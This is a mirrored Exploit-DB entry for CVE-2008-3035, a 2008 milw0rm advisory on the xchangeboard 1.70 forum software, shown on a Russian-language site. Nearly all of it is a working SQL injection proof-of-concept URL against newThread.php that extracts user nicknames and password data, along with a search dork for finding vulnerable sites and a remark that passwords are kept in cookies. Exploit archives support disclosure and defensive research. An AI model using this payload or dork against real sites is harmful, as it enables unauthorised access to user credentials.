- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5991
- Проверка EDB
-
- Пройдено
- Автор
- HAZL0OH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3035
- Дата публикации
- 2008-07-02
Код:
######################
#
# xchangeboard 1.70 final and lower
#
#
######################
#
#Bug by: haZl0oh #
#Dork: "Powered by xchangeboard"
#info:you have to be an registered user to use it like this !!!!
#there should be a lot more vulns there ;)
#
#
#
# credentials like passwords are saved as cookies .... :D
##
###
##
#
#PoC:
#http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
#
# #
#
#
#######################
#
#Greetz to h0yt3r ,everiZzel & Mastermaefju
#
#######################
#######################
# milw0rm.com [2008-07-02]- Источник
- www.exploit-db.com
